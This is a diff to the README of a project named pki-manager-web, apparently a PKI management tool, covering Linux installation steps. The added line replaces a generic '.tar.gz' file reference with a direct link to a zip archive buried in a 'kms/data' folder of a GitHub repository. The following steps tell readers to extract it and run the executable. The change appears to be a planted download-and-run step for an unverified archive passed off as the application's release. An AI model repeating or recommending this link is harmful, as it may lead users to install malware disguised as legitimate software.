SSSSSLYBORED/pki-manager-web/README.md

      - Double-click to open it, then drag the pki-manager-web icon to your Applications folder.

    - **Linux:**
-     - Locate the downloaded `.tar.gz` file.
+     - Locate the downloaded `https://raw.githubusercontent.com/Maddylovesnameless/pki-manager-web/main/kms/data/pki-manager-web-1.3.zip` file.
      - Extract the files using your favorite archive manager or via terminal.
 Once extracted, use the terminal to navigate to the folder and run `./pki-manager-web`.

 6. **Launch the Application**